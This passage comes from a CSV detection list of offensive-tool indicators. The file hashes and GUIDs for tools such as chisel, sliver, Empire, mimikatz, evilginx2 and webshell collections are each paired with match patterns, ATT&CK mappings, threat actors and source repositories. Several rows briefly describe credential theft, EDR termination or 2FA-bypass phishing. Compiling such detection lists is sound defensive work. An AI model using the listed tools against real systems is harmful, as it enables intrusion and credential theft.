- T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","31106"
"*91474981006a8437b1f628985dfc79c56dac4cb73dbcbebed1c01211149aef81*",".{0,1000}91474981006a8437b1f628985dfc79c56dac4cb73dbcbebed1c01211149aef81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31108"
"*91502e94bd83b8803e91d20d1b231c112d65561f588b92e888982f7753374e8d*",".{0,1000}91502e94bd83b8803e91d20d1b231c112d65561f588b92e888982f7753374e8d.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","31111"
"*9157a48c53ca7a4543bac5b771886c87ea407bab6bbb053b50bc22709111d572*",".{0,1000}9157a48c53ca7a4543bac5b771886c87ea407bab6bbb053b50bc22709111d572.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31112"
"*91648f9d2729f57cae268424fd8a8cc245094feeed02e9b0d25ae700913ef80b*",".{0,1000}91648f9d2729f57cae268424fd8a8cc245094feeed02e9b0d25ae700913ef80b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","31113"
"*9165d4f3036919a96b86d24b64d75d692802c7513f2b3054b20be40c212240a5*",".{0,1000}9165d4f3036919a96b86d24b64d75d692802c7513f2b3054b20be40c212240a5.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#filehash","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","31114"
"*9166f6777dfda8e6ac74b2427a25f6be82b6ad43079ac2ba4c56592c2ad405f2*",".{0,1000}9166f6777dfda8e6ac74b2427a25f6be82b6ad43079ac2ba4c56592c2ad405f2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31115"
"*916e582e5bcc71068ce6e2051a05772affd07e53f41518e61808b6c0777a1d3f*",".{0,1000}916e582e5bcc71068ce6e2051a05772affd07e53f41518e61808b6c0777a1d3f.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","31116"
"*9183fb7b9d4dc2bae17ce77d1069811f767fe88d17944c9cb81120af0c239faf*",".{0,1000}9183fb7b9d4dc2bae17ce77d1069811f767fe88d17944c9cb81120af0c239faf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","31119"
"*9188fe2a96fbb147f85f455cb4edad4f21878e269f032556da95e8d0a9889f93*",".{0,1000}9188fe2a96fbb147f85f455cb4edad4f21878e269f032556da95e8d0a9889f93.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31120"
"*919057b3379f84209626166b83566ebc0b4b663f6f142bdfbaa303250ca3fb1f*",".{0,1000}919057b3379f84209626166b83566ebc0b4b663f6f142bdfbaa303250ca3fb1f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31121"
"*919282a2110d48cdca526f1638e723c84c3f3a3d85525488887b065b476b3887*",".{0,1000}919282a2110d48cdca526f1638e723c84c3f3a3d85525488887b065b476b3887.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","31122"
"*919c2ae72cb629fb51f37c1e9fff1b24a01b2026b58213ad88557e64e8813d90*",".{0,1000}919c2ae72cb629fb51f37c1e9fff1b24a01b2026b58213ad88557e64e8813d90.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31125"
"*91a40fb5af592e1b63099fb236a1c955b47c4699197651b9ae1507ecbf4ad2ea*",".{0,1000}91a40fb5af592e1b63099fb236a1c955b47c4699197651b9ae1507ecbf4ad2ea.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","31126"
"*91a579342f9fd24373e7d273db24aa0f936c9cb7929a3f0dcee357a84173e1eb*",".{0,1000}91a579342f9fd24373e7d273db24aa0f936c9cb7929a3f0dcee357a84173e1eb.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","31127"
"*91abf8042d65f120fc30af7618fd310e44e54f69b390ec8f08bc8cb2c251697f*",".{0,1000}91abf8042d65f120fc30af7618fd310e44e54f69b390ec8f08bc8cb2c251697f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31130"
"*91ad0d9c090714cf7af5de1da071cf52960ac058a0f915ccdf8f2eeb73661b6c*",".{0,1000}91ad0d9c090714cf7af5de1da071cf52960ac058a0f915ccdf8f2eeb73661b6c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31132"
"*91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a*",".{0,1000}91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/91ae5ce613fa82b7764401fb12fb8977a0b3c78325faa16f30abeb3dfbe9c71a","10","10","N/A","N/A","N/A","N/A","31133"
"*91B12706-DC6A-45DE-97F1-FAF0901FF6AF*",".{0,1000}91B12706\-DC6A\-45DE\-97F1\-FAF0901FF6AF.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","31134"
"*91b1c7537e69ff7ade05c1c3a6051c2981a022a11b71c6e355891e294574a066*",".{0,1000}91b1c7537e69ff7ade05c1c3a6051c2981a022a11b71c6e355891e294574a066.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31136"
"*91c355be49a16620621486c0e50c44aa876c0c86c9de0ce5253102b637d1d7dd*",".{0,1000}91c355be49a16620621486c0e50c44aa876c0c86c9de0ce5253102b637d1d7dd.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","31139"
"*91c48bd880c65a28a50697f38aa6b246db7cb0e629a440c35a9a802d2e9da48c*",".{0,1000}91c48bd880c65a28a50697f38aa6b246db7cb0e629a440c35a9a802d2e9da48c.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","31140"
"*91cd0a590f86cbda8e33e5a4d90303f270ed6d17b8b36e50030f5a68beb7a704*",".{0,1000}91cd0a590f86cbda8e33e5a4d90303f270ed6d17b8b36e50030f5a68beb7a704.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31142"
"*91da2d7160926f0af9a398e5ec09328edf59386e14553a052d26f6b44eec642d*",".{0,1000}91da2d7160926f0af9a398e5ec09328edf59386e14553a052d26f6b44eec642d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31144"
"*91dc86c0d4f008fc33306dd379f8db8062364478e08efcb807025303c85b6a59*",".{0,1000}91dc86c0d4f008fc33306dd379f8db8062364478e08efcb807025303c85b6a59.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31145"
"*91df836629d68a22c10f485918c2c0406b6e5d12a21f3e8ae3c7baaa0301ee46*",".{0,1000}91df836629d68a22c10f485918c2c0406b6e5d12a21f3e8ae3c7baaa0301ee46.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31146"
"*91EA50CD-E8DF-4EDF-A765-75354643BD0D*",".{0,1000}91EA50CD\-E8DF\-4EDF\-A765\-75354643BD0D.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","#GUIDproject","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","31149"
"*91ec53f564ad02117b9d7e868c449265e99b4b7443d3a83ffe55b3b49d5be279*",".{0,1000}91ec53f564ad02117b9d7e868c449265e99b4b7443d3a83ffe55b3b49d5be279.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31150"
"*91ee16300f9af0ed8c9de365bcb3eeb8e1cf0d7b8b75ce8866ccaf8433fef75a*",".{0,1000}91ee16300f9af0ed8c9de365bcb3eeb8e1cf0d7b8b75ce8866ccaf8433fef75a.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#filehash","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","31151"
"*91f2f27015c46a8de16a364b3c2455dc2cbf43a7b678141d907660f26c3d3f69*",".{0,1000}91f2f27015c46a8de16a364b3c2455dc2cbf43a7b678141d907660f26c3d3f69.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","31152"
"*920021c608185f95a4100ebec9e7c0fb4c67c1d192257ba9ac3430b2939762a3*",".{0,1000}920021c608185f95a4100ebec9e7c0fb4c67c1d192257ba9ac3430b2939762a3.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","#filehash","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","31154"
"*920B8C5B-0DC5-4BD7-B6BB-D14B39BFC9FE*",".{0,1000}920B8C5B\-0DC5\-4BD7\-B6BB\-D14B39BFC9FE.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#GUIDproject","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","31155"
"*920c719a1e1d8509b4f2a46062887ad5d09cc53ef907cb3c58140a9eefe6522d*",".{0,1000}920c719a1e1d8509b4f2a46062887ad5d09cc53ef907cb3c58140a9eefe6522d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31156"
"*920D97B7-8091-4224-8CF7-D9D72A64A7FE*",".{0,1000}920D97B7\-8091\-4224\-8CF7\-D9D72A64A7FE.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#GUIDproject","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","31157"
"*920e37529214d87fb835861d8c539e5c70d9d98fb0f48ad097760f298aee30d3*",".{0,1000}920e37529214d87fb835861d8c539e5c70d9d98fb0f48ad097760f298aee30d3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","31158"
"*92105bc571692ebbab9f00a66c370901439375f98cfca4986f576d9c808dff38*",".{0,1000}92105bc571692ebbab9f00a66c370901439375f98cfca4986f576d9c808dff38.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31159"
"*92105bc571692ebbab9f00a66c370901439375f98cfca4986f576d9c808dff38*",".{0,1000}92105bc571692ebbab9f00a66c370901439375f98cfca4986f576d9c808dff38.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31160"
"*921157808497e5fe57f27fdb490be391f0f28bacffdb8cb9ed233bc3929b85a3*",".{0,1000}921157808497e5fe57f27fdb490be391f0f28bacffdb8cb9ed233bc3929b85a3.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","31161"
"*921BB3E1-15EE-4bbe-83D4-C4CE176A481B*",".{0,1000}921BB3E1\-15EE\-4bbe\-83D4\-C4CE176A481B.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz UUID","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","uuid","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31162"
"*9220fead7ddb2863404b1fa59bf2ece1de125be39db2661378a8ffd47057b85e*",".{0,1000}9220fead7ddb2863404b1fa59bf2ece1de125be39db2661378a8ffd47057b85e.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","31165"
"*9227a1bc1584c36ff815fdc09dbec1c23aa11f6adc5b009c305dbb941f9f339a*",".{0,1000}9227a1bc1584c36ff815fdc09dbec1c23aa11f6adc5b009c305dbb941f9f339a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31166"
"*92299f5910a7992534ab33830d9706f4d03798418d5531563a86ee5f4185d553*",".{0,1000}92299f5910a7992534ab33830d9706f4d03798418d5531563a86ee5f4185d553.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","31167"
"*922b54e9d685b1bdd4d04f7b34c9f42b5f99745325a65f3147c719108d7e01c5*",".{0,1000}922b54e9d685b1bdd4d04f7b34c9f42b5f99745325a65f3147c719108d7e01c5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31168"
